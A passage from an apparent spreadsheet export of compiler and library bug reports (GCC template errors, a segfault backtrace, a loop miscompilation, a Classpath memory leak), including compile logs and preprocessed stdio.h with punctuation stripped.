ssA.cc classA.ii
GNU CPP version 2.97 20010115 (experimental) (cpplib) (sparc)
ignoring nonexistent directory /usr/local/include
ignoring duplicate directory /ncsu/meeberdt/local/gcc-0115/include/g++-v3
ignoring duplicate directory /ncsu/meeberdt/local/gcc-0115/lib/gcc-lib/sparc-su
n-solaris2.6/2.97/include
ignoring duplicate directory /ncsu/meeberdt/local/gcc-0115/sparc-sun-solaris2.6
/include
#include ... search starts here:
#include  search starts here:
 /ncsu/meeberdt/local/gcc-curr/include/g++-v3
 /ncsu/meeberdt/local/gcc-curr/lib/gcc-lib/sparc-sun-solaris2.6/2.97/include
 /ncsu/meeberdt/local/gcc-curr/sparc-sun-solaris2.6/include
 /ncsu/meeberdt/local/gcc-0115/sparc-sun-solaris2.6/include/g++-v3
 /usr/include
End of search list.
 /ncsu/meeberdt/local/gcc-curr/bin/../lib/gcc-lib/sparc-sun-solaris2.6/2.97/cc1p
lus -fpreprocessed classA.ii -quiet -dumpbase classA.cc -W -Wall -version -o cla
ssA.s
GNU CPP version 2.97 20010115 (experimental) (cpplib) (sparc)
GNU C++ version 2.97 20010115 (experimental) (sparc-sun-solaris2.6)
        compiled by GNU C version 2.97 20010115 (experimental).
classB.h: In static member function `static _Type
   _STL_ERROR::__assignment_operator_requirement_violation(_Type) [with _Type =
   B]':
/ncsu/meeberdt/local/gcc-curr/include/g++-v3/bits/concept_checks.h:530:   instan
tiated from `static void _Assignable_concept_specification::_Assignable_r
equirement_violation(_Type) [with _Type = B]'
/ncsu/meeberdt/local/gcc-curr/include/g++-v3/bits/stl_vector.h:161:   instantiat
ed from `std::vector &gt;'
classA.h:18:   instantiated from here
classB.h:22: `B&amp; B::operator=(const B&amp;)' is private
/ncsu/meeberdt/local/gcc-curr/include/g++-v3/bits/concept_checks.h:370: within
   this context
classB.h: In static member function `static _Type
   _STL_ERROR::__const_parameter_required_for_assignment_operator(_Type const
   _Type&amp;) [with _Type = B]':
/ncsu/meeberdt/local/gcc-curr/include/g++-v3/bits/concept_checks.h:533:   instan
tiated from `static void _Assignable_concept_specification::_Assignable_r
equirement_violation(_Type) [with _Type = B]'
/ncsu/meeberdt/local/gcc-curr/include/g++-v3/bits/stl_vector.h:161:   instantiat
ed from `std::vector &gt;'
classA.h:18:   instantiated from here
classB.h:22: `B&amp; B::operator=(const B&amp;)' is private
/ncsu/meeberdt/local/gcc-curr/include/g++-v3/bits/concept_checks.h:390: within
   this context
Release:
gcc version 2.97 20010115 (experimental)
Environment:
compiler built and this example run under Solaris 2.6</t>
  </si>
  <si>
    <t>meeberdt</t>
  </si>
  <si>
    <t>CLASSPATH-26368</t>
  </si>
  <si>
    <t>Possible memory leak in GapContent</t>
  </si>
  <si>
    <t>In GapContent we store all created Position instances in an ArrayList. However we never do remove any Position instances even when they are not used anymore. With large documents and lots of editing this will blow up significantly (not an issue yet since text components are not yet working very reliably but...). I have not completely made up my mind about what will be the best solution. We will likely need some WeakReferences in the ArrayList but then these must be cleared up regulary and reliably etc.</t>
  </si>
  <si>
    <t>GCC-45716</t>
  </si>
  <si>
    <t>[4.6 regression] ICE: segmentation fault at gcc/tree-ssa-ccp.c:1347</t>
  </si>
  <si>
    <t>/usr/libexec/gcc/i686-pc-cygwin/4.6.0/cc1.exe -fpreprocessed h264_cabac.i -march=core2 -mcx16 -msahf -msse4.1 --param l1-cache-size=32 --param l1-cache-line-size=64 --param l2-cache-size=2048 -mtune=core2 -quiet -dumpbase h264_cabac.i -march=core2 -mfpmath=sse -auxbase h264_cabac -g -O4 -std=gnu99 -version -ffast-math -fomit-frame-pointer -fno-common -o tmp.s
(gdb) set args -fpreprocessed h264_cabac.i -march=core2 -mcx16 -msahf -msse4.1
--param l1-cache-size=32 --param l1-cache-line-size=64 --param l2-cache-size=20
48 -mtune=core2 -quiet -dumpbase h264_cabac.i -march=core2 -mfpmath=sse -auxbas
e h264_cabac -g -O4 -std=gnu99 -version -ffast-math -fomit-frame-pointer -fno-c
ommon -o tmp.s -v
(gdb) r
Starting program: /usr/libexec/gcc/i686-pc-cygwin/4.6.0/cc1.exe -fpreprocessed h
264_cabac.i -march=core2 -mcx16 -msahf -msse4.1 --param l1-cache-size=32 --param
 l1-cache-line-size=64 --param l2-cache-size=2048 -mtune=core2 -quiet -dumpbase
h264_cabac.i -march=core2 -mfpmath=sse -auxbase h264_cabac -g -O4 -std=gnu99 -ve
rsion -ffast-math -fomit-frame-pointer -fno-common -o tmp.s -v
[New Thread 6004.0xc50]
warning: the debug information found in /cygdrive/d/cygwin/bin/cygwin1.dbg doe
s not match /cygdrive/d/cygwin/bin/cygwin1.dll (CRC mismatch).
[New Thread 6004.0x112c]
GNU C (GCC) version 4.6.0 20100918 (experimental) (i686-pc-cygwin)
        compiled by GNU C version 4.6.0 20100918 (experimental) GMP version 5.0
.0 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
[New Thread 6004.0x4ec]
ignoring duplicate directory /usr/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/i686-pc-cygwin/4.6.0/include
 /usr/local/include
 /usr/lib/gcc/i686-pc-cygwin/4.6.0/include-fixed
 /usr/lib/gcc/i686-pc-cygwin/4.6.0/../../../../i686-pc-cygwin/include
End of search list.
GNU C (GCC) version 4.6.0 20100918 (experimental) (i686-pc-cygwin)
        compiled by GNU C version 4.6.0 20100918 (experimental) GMP version 5.0
.0 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 37b591552c4af58bc2f535240f94baa1
Program received signal SIGSEGV Segmentation fault.
0x00a241fa in get_base_constructor (base=0x7fa6e1c0
    offset=) at ../.././gcc/tree-ssa-ccp.c:1347
1347                  &amp;&amp; !varpool_get_node (base)-&gt;const_value_known))
(gdb) bt
#0  0x00a241fa in get_base_constructor (base=0x7fa6e1c0
    offset=) at ../.././gcc/tree-ssa-ccp.c:1347
#1  0x00a2029b in fold_const_aggregate_ref (t=0x7f9451b8)
    at ../.././gcc/tree-ssa-ccp.c:1396
#2  0x00a24248 in get_base_constructor (base=0x7f9451b8
    offset=) at ../.././gcc/tree-ssa-ccp.c:1361
#3  0x00a2029b in fold_const_aggregate_ref (t=0x7f945190)
    at ../.././gcc/tree-ssa-ccp.c:1396
#4  0x008d0448 in maybe_fold_reference (expr=0x7f945190 is_lhs=0x0)
    at ../.././gcc/gimple-fold.c:480
#5  0x008d4125 in fold_stmt_1 (gsi=0x4a5c820 inplace=0x0)
    at ../.././gcc/gimple-fold.c:1559
#6  0x009b9882 in optimize_stmt (bb=0x7fa781f0 si=...)
    at ../.././gcc/tree-ssa-dom.c:2120
#7  0x009bac00 in dom_opt_enter_block (walk_data=0x4a5c930 bb=0x7fa781f0)
    at ../.././gcc/tree-ssa-dom.c:1671
#8  0x00b26025 in walk_dominator_tree (walk_data=0x4a5c930 bb=0x7fa781f0)
    at ../.././gcc/domwalk.c:188
#9  0x009b928b in tree_ssa_dominator_optimize ()
    at ../.././gcc/tree-ssa-dom.c:698
#10 0x0065182d in execute_one_pass (pass=0xc4c0e0)
    at ../.././gcc/passes.c:1573
#11 execute_one_pass (pass=0xc4c0e0) at ../.././gcc/passes.c:1516
#12 0x00651ac5 in execute_pass_list (pass=0xc4c0e0)
---Type  to continue or q  to quit---
    at ../.././gcc/passes.c:1628
#13 0x00651ad8 in execute_pass_list (pass=0xc4b520)
    at ../.././gcc/passes.c:1629
#14 0x0078d30b in tree_rest_of_compilation (fndecl=0x7fc05600)
    at ../.././gcc/tree-optimize.c:452
#15 0x0065404c in cgraph_expand_function (node=0x7fa5f618)
    at ../.././gcc/cgraphunit.c:1469
#16 0x00656e15 in cgraph_expand_all_functions ()
    at ../.././gcc/cgraphunit.c:1548
#17 cgraph_optimize () at ../.././gcc/cgraphunit.c:1804
#18 0x006573fa in cgraph_finalize_compilation_unit ()
    at ../.././gcc/cgraphunit.c:1012
#19 0x0041c0a8 in c_write_global_declarations () at ../.././gcc/c-decl.c:9732
#20 0x006606d2 in compile_file (argc=0x1f argv=0x4e9a208)
    at ../.././gcc/toplev.c:967
#21 do_compile (argc=0x1f argv=0x4e9a208) at ../.././gcc/toplev.c:2394
#22 toplev_main (argc=0x1f argv=0x4e9a208) at ../.././gcc/toplev.c:2435
#23 0x004a62a0 in main (argc=0x1f argv=0x4e9a208) at ../.././gcc/main.c:36
(gdb)
(gdb)</t>
  </si>
  <si>
    <t>jojelino</t>
  </si>
  <si>
    <t>GCC-39904</t>
  </si>
  <si>
    <t>[4.3 Regressions] Loop is completely skipped due to wrong types in SCEV const-prop</t>
  </si>
  <si>
    <t xml:space="preserve">The following simple program produces some very unusual results in gcc 4.3.2:
#include 
int n = 5
int main ()
{
    int m = 0
    for (int i = 0 i &lt; n i++)
    {
        m++
        m++
    }
    printf (m is %d.\n m)
    for (int i = 0 i &lt; m i++)
        printf (i is %d.\n i)
    printf (where is the output?\n)
    return 0
}
When I run the program using g++ -O2 a.cpp ./a.out I obtain the following output:
m is 10.
where is the output?
Without -O2 the output is as follows:
m is 10.
i is 0.
i is 1.
i is 2.
i is 3.
i is 4.
i is 5.
i is 6.
i is 7.
i is 8.
i is 9.
where is the output?
gcc -v gives the following:
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.3.2-1ubuntu12' --with-bugurl=file:///usr/share/doc/gcc-4.3/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.3 --program-suffix=-4.3 --enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc --enable-mpfr --enable-targets=all --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.3.2 (Ubuntu 4.3.2-1ubuntu12) 
Lastly here is a.ii:
# 1 a.cpp
# 1 
# 1 
# 1 a.cpp
# 1 /usr/include/c++/4.3/cstdio 1 3
# 46 /usr/include/c++/4.3/cstdio 3
# 47 /usr/include/c++/4.3/cstdio 3
# 1 /usr/include/c++/4.3/i486-linux-gnu/bits/c++config.h 1 3
# 40 /usr/include/c++/4.3/i486-linux-gnu/bits/c++config.h 3
# 1 /usr/include/c++/4.3/i486-linux-gnu/bits/os_defines.h 1 3
# 44 /usr/include/c++/4.3/i486-linux-gnu/bits/os_defines.h 3
# 1 /usr/include/features.h 1 3 4
# 330 /usr/include/features.h 3 4
# 1 /usr/include/sys/cdefs.h 1 3 4
# 348 /usr/include/sys/cdefs.h 3 4
# 1 /usr/include/bits/wordsize.h 1 3 4
# 349 /usr/include/sys/cdefs.h 2 3 4
# 331 /usr/include/features.h 2 3 4
# 354 /usr/include/features.h 3 4
# 1 /usr/include/gnu/stubs.h 1 3 4
# 1 /usr/include/bits/wordsize.h 1 3 4
# 5 /usr/include/gnu/stubs.h 2 3 4
# 1 /usr/include/gnu/stubs-32.h 1 3 4
# 8 /usr/include/gnu/stubs.h 2 3 4
# 355 /usr/include/features.h 2 3 4
# 45 /usr/include/c++/4.3/i486-linux-gnu/bits/os_defines.h 2 3
# 41 /usr/include/c++/4.3/i486-linux-gnu/bits/c++config.h 2 3
# 1 /usr/include/c++/4.3/i486-linux-gnu/bits/cpu_defines.h 1 3
# 44 /usr/include/c++/4.3/i486-linux-gnu/bits/c++config.h 2 3
# 233 /usr/include/c++/4.3/i486-linux-gnu/bits/c++config.h 3
namespace std __attribute__ ((__visibility__ (default))) {
# 245 /usr/include/c++/4.3/i486-linux-gnu/bits/c++config.h 3
}
# 49 /usr/include/c++/4.3/cstdio 2 3
# 1 /usr/include/c++/4.3/cstddef 1 3
# 45 /usr/include/c++/4.3/cstddef 3
# 46 /usr/include/c++/4.3/cstddef 3
# 1 /usr/lib/gcc/i486-linux-gnu/4.3.2/include/stddef.h 1 3 4
# 152 /usr/lib/gcc/i486-linux-gnu/4.3.2/include/stddef.h 3 4
typedef int ptrdiff_t
# 214 /usr/lib/gcc/i486-linux-gnu/4.3.2/include/stddef.h 3 4
typedef unsigned int size_t
# 49 /usr/include/c++/4.3/cstddef 2 3
namespace std __attribute__ ((__visibility__ (default))) {
  using ::ptrdiff_t
  using ::size_t
}
# 50 /usr/include/c++/4.3/cstdio 2 3
# 1 /usr/include/stdio.h 1 3 4
# 30 /usr/include/stdio.h 3 4
extern C {
# 1 /usr/lib/gcc/i486-linux-gnu/4.3.2/include/stddef.h 1 3 4
# 35 /usr/include/stdio.h 2 3 4
# 1 /usr/include/bits/types.h 1 3 4
# 28 /usr/include/bits/types.h 3 4
# 1 /usr/include/bits/wordsize.h 1 3 4
# 29 /usr/include/bits/types.h 2 3 4
typedef unsigned char __u_char
typedef unsigned short int __u_short
typedef unsigned int __u_int
typedef unsigned long int __u_long
typedef signed char __int8_t
typedef unsigned char __uint8_t
typedef signed short int __int16_t
typedef unsigned short int __uint16_t
typedef signed int __int32_t
typedef unsigned int __uint32_t
__extension__ typedef signed long long int __int64_t
__extension__ typedef unsigned long long int __uint64_t
__extension__ typedef long long int __quad_t
__extension__ typedef unsigned long long int __u_quad_t
# 131 /usr/include/bits/types.h 3 4
# 1 /usr/include/bits/typesizes.h 1 3 4
# 132 /usr/include/bits/types.h 2 3 4
__extension__ typedef __u_quad_t __dev_t
__extension__ typedef unsigned int __uid_t
__extension__ typedef unsigned int __gid_t
__extension__ typedef unsigned long int __ino_t
__extension__ typedef __u_quad_t __ino64_t
__extension__ typedef unsigned int __mode_t
__extension__ typedef unsigned int __nlink_t
__extension__ typedef long int __off_t
__extension__ typedef __quad_t __off64_t
__extension__ typedef int __pid_t
__extension__ typedef struct { int __val[2] } __fsid_t
__extension__ typedef long int __clock_t
__extension__ typedef unsigned long int __rlim_t
__extension__ typedef __u_quad_t __rlim64_t
__extension__ typedef unsigned int __id_t
__extension__ typedef long int __time_t
__extension__ typedef unsigned int __useconds_t
__extension__ typedef long int __suseconds_t
__extension__ typedef int __daddr_t
__extension__ typedef long int __swblk_t
__extension__ typedef int __key_t
__extension__ typedef int __clockid_t
__extension__ typedef void * __timer_t
__extension__ typedef long int __blksize_t
__extension__ typedef long int __blkcnt_t
__extension__ typedef __quad_t __blkcnt64_t
__extension__ typedef unsigned long int __fsblkcnt_t
__extension__ typedef __u_quad_t __fsblkcnt64_t
__extension__ typedef unsigned long int __fsfilcnt_t
__extension__ typedef __u_quad_t __fsfilcnt64_t
__extension__ typedef int __ssize_t
typedef __off64_t __loff_t
typedef __quad_t *__qaddr_t
typedef char *__caddr_t
__extension__ typedef int __intptr_t
__extension__ typedef unsigned int __socklen_t
# 37 /usr/include/stdio.h 2 3 4
# 45 /usr/include/stdio.h 3 4
struct _IO_FILE
typedef struct _IO_FILE FILE
# 65 /usr/include/stdio.h 3 4
typedef struct _IO_FILE __FILE
# 75 /usr/include/stdio.h 3 4
# 1 /usr/include/libio.h 1 3 4
# 32 /usr/include/libio.h 3 4
# 1 /usr/include/_G_config.h 1 3 4
# 15 /usr/include/_G_config.h 3 4
# 1 /usr/lib/gcc/i486-linux-gnu/4.3.2/include/stddef.h 1 3 4
# 16 /usr/include/_G_config.h 2 3 4
# 1 /usr/include/wchar.h 1 3 4
# 78 /usr/include/wchar.h 3 4
typedef struct
{
  int __count
  union
  {
    unsigned int __wch
    char __wchb[4]
  } __value
} __mbstate_t
# 21 /usr/include/_G_config.h 2 3 4
typedef struct
{
  __off_t __pos
  __mbstate_t __state
} _G_fpos_t
typedef struct
{
  __off64_t __pos
  __mbstate_t __state
} _G_fpos64_t
# 53 /usr/include/_G_config.h 3 4
typedef int _G_int16_t __attribute__ ((__mode__ (__HI__)))
typedef int _G_int32_t __attribute__ ((__mode__ (__SI__)))
typedef unsigned int _G_uint16_t __attribute__ ((__mode__ (__HI__)))
typedef unsigned int _G_uint32_t __attribute__ ((__mode__ (__SI__)))
# 33 /usr/include/libio.h 2 3 4
# 53 /usr/include/libio.h 3 4
# 1 /usr/lib/gcc/i486-linux-gnu/4.3.2/include/stdarg.h 1 3 4
# 43 /usr/lib/gcc/i486-linux-gnu/4.3.2/include/stdarg.h 3 4
typedef __builtin_va_list __gnuc_va_list
# 54 /usr/include/libio.h 2 3 4
# 170 /usr/include/libio.h 3 4
struct _IO_jump_t struct _IO_FILE
# 180 /usr/include/libio.h 3 4
typedef void _IO_lock_t
struct _IO_marker {
  struct _IO_marker *_next
  struct _IO_FILE *_sbuf
  int _pos
# 203 /usr/include/libio.h 3 4
}
enum __codecvt_result
{
  __codecvt_ok
  __codecvt_partial
  __codecvt_error
  __codecvt_noconv
}
# 271 /usr/include/libio.h 3 4
struct _IO_FILE {
  int _flags
  char* _IO_read_ptr
  char* _IO_read_end
  char* _IO_read_base
  char* _IO_write_base
  char* _IO_write_ptr
  char* _IO_write_end
  char* _IO_buf_base
  char* _IO_buf_end
  char *_IO_save_base
  char *_IO_backup_base
  char *_IO_save_end
  struct _IO_marker *_markers
  struct _IO_FILE *_chain
  int _fileno
  int _flags2
  __off_t _old_offset
  unsigned short _cur_column
  signed char _vtable_offset
  char _shortbuf[1]
  _IO_lock_t *_lock
# 319 /usr/include/libio.h 3 4
  __off64_t _offset
# 328 /usr/include/libio.h 3 4
  void *__pad1
  void *__pad2
  void *__pad3
  void *__pad4
  size_t __pad5
  int _mode
  char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)]
}
struct _IO_FILE_plus
extern struct _IO_FILE_plus _IO_2_1_stdin_
extern struct _IO_FILE_plus _IO_2_1_stdout_
extern struct _IO_FILE_plus _IO_2_1_stderr_
# 364 /usr/include/libio.h 3 4
typedef __ssize_t __io_read_fn (void *__cookie char *__buf size_t __nbytes)
typedef __ssize_t __io_write_fn (void *__cookie __const char *__buf
     size_t __n)
typedef int __io_seek_fn (void *__cookie __off64_t *__pos int __w)
typedef int __io_close_fn (void *__cookie)
typedef __io_read_fn cookie_read_function_t
typedef __io_write_fn cookie_write_function_t
typedef __io_seek_fn cookie_seek_function_t
typedef __io_close_fn cookie_close_function_t
typedef struct
{
  __io_read_fn *read
  __io_write_fn *write
  __io_seek_fn *seek
  __io_close_fn *close
} _IO_cookie_io_functions_t
typedef _IO_cookie_io_functions_t cookie_io_functions_t
struct _IO_cookie_file
extern void _IO_cookie_init (struct _IO_cookie_file *__cfile int __read_write
        void *__cookie _IO_cookie_io_functions_t __fns)
extern C {
extern int __underflow (_IO_FILE *)
extern int __uflow (_IO_FILE *)
extern int __overflow (_IO_FILE * int)
# 458 /usr/include/libio.h 3 4
extern int _IO_getc (_IO_FILE *__fp)
extern int _IO_putc (int __c _IO_FILE *__fp)
extern int _IO_feof (_IO_FILE *__fp) throw ()
extern int _IO_ferror (_IO_FILE *__fp) throw ()
extern int _IO_peekc_locked (_IO_FILE *__fp)
extern void _IO_flockfile (_IO_FILE *) throw ()
extern void _IO_funlockfile (_IO_FILE *) throw ()
extern int _IO_ftrylockfile (_IO_FILE *) throw ()
# 488 /usr/include/libio.h 3 4
extern int _IO_vfscanf (_IO_FILE * __restrict const char * __restrict
   __gnuc_va_list int *__restrict)
extern int _IO_vfprintf (_IO_FILE *__restrict const char *__restrict
    __gnuc_va_list)
extern __ssize_t _IO_padn (_IO_FILE * int __ssize_t)
extern size_t _IO_sgetn (_IO_FILE * void * size_t)
extern __off64_t _IO_seekoff (_IO_FILE * __off64_t int int)
extern __off64_t _IO_seekpos (_IO_FILE * __off64_t int)
extern void _IO_free_backup_area (_IO_FILE *) throw ()
# 550 /usr/include/libio.h 3 4
}
# 76 /usr/include/stdio.h 2 3 4
typedef __gnuc_va_list va_list
# 89 /usr/include/stdio.h 3 4
typedef _G_fpos_t fpos_t
typedef _G_fpos64_t fpos64_t
# 141 /usr/include/stdio.h 3 4
# 1 /usr/include/bits/stdio_lim.h 1 3 4
# 142 /usr/include/stdio.h 2 3 4
extern struct _IO_FILE *stdin
extern struct _IO_FILE *stdout
extern struct _IO_FILE *stderr
extern int remove (__const char *__filename) throw ()
extern int rename (__const char *__old __const char *__new) throw ()
extern int renameat (int __oldfd __const char *__old int __newfd
       __const char *__new) throw ()
extern FILE *tmpfile (void) __attribute__ ((__warn_unused_result__))
# 182 /usr/include/stdio.h 3 4
extern FILE *tmpfile64 (void) __attribute__ ((__warn_unused_result__))
extern char *tmpnam (char *__s) throw () __attribute__ ((__warn_unused_result__))
extern char *tmpnam_r (char *__s) throw () __attribute__ ((__warn_unused_result__))
# 204 /usr/include/stdio.h 3 4
extern char *tempnam (__const char *__dir __const char *__pfx)
     throw () __attribute__ ((__malloc__)) __attribute__ ((__warn_unused_result__))
extern int fclose (FILE *__stream)
extern int fflush (FILE *__stream)
# 229 /usr/include/stdio.h 3 4
extern int fflush_unlocked (FILE *__stream)
# 239 /usr/include/stdio.h 3 4
extern int fcloseall (void)
extern FILE *fopen (__const char *__restrict __filename
      __const char *__restrict __modes) __attribute__ ((__warn_unused_result__))
extern FILE *freopen (__const char *__restrict __filename
        __const char *__restrict __modes
        FILE *__restrict __stream) __attribute__ ((__warn_unused_result__))
# 272 /usr/include/stdio.h 3 4
extern FILE *fopen64 (__const char *__restrict __filename
        __const char *__restrict __modes) __attribute__ ((__warn_unused_result__))
extern FILE *freopen64 (__const char *__restrict __filename
   __const char *__restrict __modes
   FILE *__restrict __stream) __attribute__ ((__warn_unused_result__))
extern FILE *fdopen (int __fd __const char *__modes) throw () __attribute__ ((__warn_unused_result__))
extern FILE *fopencookie (void *__restrict __magic_cookie
     __const char *__restrict __modes
     _IO_cookie_io_functions_t __io_funcs) throw () __attribute__ ((__warn_unused_result__))
extern FILE *fmemopen (void *__s size_t __len __const char *__modes)
  throw () __attribute__ ((__warn_unused_result__))
extern FILE *open_memstream (char **__bufloc size_t *__sizeloc) throw () __attribute__ ((__warn_unused_result__))
extern void setbuf (FILE *__restrict __stream char *__restrict __buf) throw ()
extern int setvbuf (FILE *__restrict __stream char *__restrict __buf
      int __modes size_t __n) throw ()
extern void setbuffer (FILE *__restrict __stream char *__restrict __buf
         size_t __size) throw ()
extern void setlinebuf (FILE *__stream) throw ()
extern int fprintf (FILE *__restrict __stream
      __const char *__restrict __format ...)
extern int printf (__const char *__restrict __format ...)
extern int sprintf (char *__restrict __s
      __const char *__restrict __format ...) throw ()
extern int vfprintf (FILE *__restrict __s __const char *__restrict __format
       __gnuc_va_list __arg)
extern int vprintf (__const char *__restrict __format __gnuc_va_list __arg)
extern int vsprintf (char *__restrict __s __const char *__restrict __format
       __gnuc_va_list __arg) throw ()
extern int snprintf (char *__restrict __s size_t __maxlen
       __const char *__restrict __format ...)
     throw () __attribute__ ((__format__ (__printf__ 3 4)))
extern int vsnprintf (char *__restrict __s size_t __maxlen
        __const char *__restrict __format __gnuc_va_list __arg)
     throw () __attribute__ ((__format__ (__printf__ 3 0)))
extern int vasprintf (char **__restrict __ptr __const char *__restrict __f
        __gnuc_va_list __arg)
     throw () __attribute__ ((__format__ (__printf__ 2 0))) __attribute__ ((__warn_unused_result__))
extern int __asprintf (char **__restrict __ptr
         __const char *__restrict __fmt ...)
     throw () __attribute__ ((__format__ (__printf__ 2 3))) __attribute__ ((__warn_unused_result__))
extern int asprintf (char **__restrict __ptr
       __const char *__restrict __fmt ...)
     throw () __attribute__ ((__format__ (__printf__ 2 3))) __attribute__ ((__warn_unused_result__))
extern int vdprintf (int __fd __const char *__restrict __fmt
       __gnuc_va_list __arg)
     __attribute__ ((__format__ (__printf__ 2 0)))
extern int dprintf (int __fd __const char *__restrict __fmt ...)
     __attribute__ ((__format__ (__printf__ 2 3)))
extern int fscanf (FILE *__restrict __stream
     __const char *__restrict __format ...) __attribute__ ((__warn_unused_result__))
extern int scanf (__const char *__restrict __format ...) __attribute__ ((__warn_unused_result__))
extern int sscanf (__const char *__restrict __s
     __const char *__restrict __format ...) throw ()
# 441 /usr/include/stdio.h 3 4
extern int vfscanf (FILE *__restrict __s __const char *__restrict __format
      __gnuc_va_list __arg)
     __attribute__ ((__format__ (__scanf__ 2 0))) __attribute__ ((__warn_unused_result__))
extern int vscanf (__const char *__restrict __format __gnuc_va_list __arg)
     __attribute__ ((__format__ (__scanf__ 1 0))) __attribute__ ((__warn_unused_result__))
extern int vsscanf (__const char *__restrict __s
      __const char *__restrict __format __gnuc_va_list __arg)
     throw () __attribute__ ((__format__ (__scanf__ 2 0)))
# 500 /usr/include/stdio.h 3 4
extern int fgetc (FILE *__stream)
extern int getc (FILE *__stream)
extern int getchar (void)
# 528 /usr/include/stdio.h 3 4
extern int getc_unlocked (FILE *__stream)
extern int getchar_unlocked (void)
# 539 /usr/include/stdio.h 3 4
extern int fgetc_unlocked (FILE *__stream)
extern int fputc (int __c FILE *__stream)
extern int putc (int __c FILE *__stream)
extern int putchar (int __c)
# 572 /usr/include/stdio.h 3 4
extern int fputc_unlocked (int __c FILE *__stream)
extern int putc_unlocked (int __c FILE *__stream)
extern int putchar_unlocked (int __c)
extern int getw (FILE *__stream)
extern int putw (int __w FILE *__stream)
extern char *fgets (char *__restrict __s int __n FILE *__restrict __stream)
     __attribute__ ((__warn_unused_result__))
extern char *gets (char *__s) __attribute__ ((__warn_unused_result__))
# 618 /usr/include/stdio.h 3 4
extern char *fgets_unlocked (char *__restrict __s int __n
        FILE *__restrict __stream) __attribute__ ((__warn_unused_result__))
# 634 /usr/include/stdio.h 3 4
extern __ssize_t __getdelim (char **__restrict __lineptr
          size_t *__restrict __n int __delimiter
          FILE *__restrict __stream) __attribute__ ((__warn_unused_result__))
extern __ssize_t getdelim (char **__restrict __lineptr
        size_t *__restrict __n int __delimiter
        FILE *__restrict __stream) __attribute__ ((__warn_unused_result__))
extern __ssize_t getline (char **__restrict __lineptr
       size_t *__restrict __n
       FILE *__restrict __stream) __attribute__ ((__warn_unused_result__))
extern int fputs (__const char *__restrict __s FILE *__restrict __stream)
extern int puts (__const char *__s)
extern int ungetc (int __c FILE *__stream)
extern size_t fread (void *__restrict __ptr size_t __size
       size_t __n FILE *__restrict __stream) __attribute__ ((__warn_unused_result__))
extern size_t fwrite (__const void *__restrict __ptr size_t __size
        size_t __n FILE *__restrict __s) __attribute__ ((__warn_unused_result__))
# 695 /usr/include/stdio.h 3 4
extern int fputs_unlocked (__const char *__restrict __s
      FILE *__restrict __stream)
# 706 /usr/include/stdio.h 3 4
extern size_t fread_unlocked (void *__restrict __ptr size_t __size
         size_t __n FILE *__restrict __stream) __attribute__ ((__warn_unused_result__))
extern size_t fwrite_unlocked (__const void *__restrict __ptr size_t __size
          size_t __n FILE *__restrict __stream) __attribute__ ((__warn_unused_result__))
extern int fseek (FILE *__stream long int __off int __whence)
extern long int ftell (FILE *__stream) __attribute__ ((__warn_unused_result__))
extern void rewind (FILE *__stream)
# 742 /usr/include/stdio.h 3 4
extern int fseeko (FILE *__stream __off_t __off int __whence)
extern __off_t ftello (FILE *__stream) __attribute__ ((__warn_unused_result__))
# 761 /usr/include/stdio.h 3 4
extern int fgetpos (FILE *__restrict __stream fpos_t *__restrict __pos)
extern int fsetpos (FILE *__stream __const fpos_t *__pos)
# 784 /usr/include/stdio.h 3 4
extern int fseeko64 (FILE *__stream __off64_t __off int __whence)
extern __off64_t ftello64 (FILE *__stream) __attribute__ ((__warn_unused_result__))
extern int fgetpos64 (FILE *__restrict __stream fpos64_t *__restrict __pos)
extern int fsetpos64 (FILE *__stream __const fpos64_t *__pos)
extern void clearerr (FILE *__stream) throw ()
extern int feof (FILE *__stream) throw () __attribute__ ((__warn_unused_result__))
extern int ferror (FILE *__stream) throw () __attribute__ ((__warn_unused_result__))
extern void clearerr_unlocked (FILE *__stream) throw ()
extern int feof_unlocked (FILE *__stream) throw () __attribute__ ((__warn_unused_result__))
extern int ferror_unlocked (FILE *__stream) throw () __attribute__ ((__warn_unused_result__))
extern void perror (__const char *__s)
# 1 /usr/include/bits/sys_errlist.h 1 3 4
# 27 /usr/include/bits/sys_errlist.h 3 4
extern int sys_nerr
extern __const char *__const sys_errlist[]
extern int _sys_nerr
extern __const char *__const _sys_errlist[]
# 823 /usr/include/stdio.h 2 3 4
extern int fileno (FILE *__stream) throw () __attribute__ ((__warn_unused_result__))
extern int fileno_unlocked (FILE *__stream) throw () __attribute__ ((__warn_unused_result__))
# 842 /usr/include/stdio.h 3 4
extern FILE *popen (__const char *__command __const char *__modes) __attribute__ ((__warn_unused_result__))
extern int pclose (FILE *__stream)
extern char *ctermid (char *__s) throw ()
extern char *cuserid (char *__s)
struct obstack
extern int obstack_printf (struct obstack *__restrict __obstack
      __const char *__restrict __format ...)
     throw () __attribute__ ((__format__ (__printf__ 2 3)))
extern int obstack_vprintf (struct obstack *__restrict __obstack
       __const char *__restrict __format
       __gnuc_va_list __args)
     throw () __attribute__ ((__format__ (__printf__ 2 0)))
extern void flockfile (FILE *__stream) throw ()
extern int ftrylockfile (FILE *__stream) throw () __attribute__ ((__warn_unused_result__))
extern void funlockfile (FILE *__stream) throw ()
# 903 /usr/include/stdio.h 3 4
# 1 /usr/include/bits/stdio.h 1 3 4
# 44 /usr/include/bits/stdio.h 3 4
extern __inline __attribute__ ((__gnu_inline__)) int
getchar (void)
{
  return _IO_getc (stdin)
}
extern __inline __attribute__ ((__gnu_inline__)) int
fgetc_unlocked (FILE *__fp)
{
  return (__builtin_expect (((__fp)-&gt;_IO_read_ptr &gt;= (__fp)-&gt;_IO_read_end) 0) ? __uflow (__fp) : *(unsigned char *) (__fp)-&gt;_IO_read_ptr++)
}
extern __inline __attribute__ ((__gnu_inline__)) int
getc_unlocked (FILE *__fp)
{
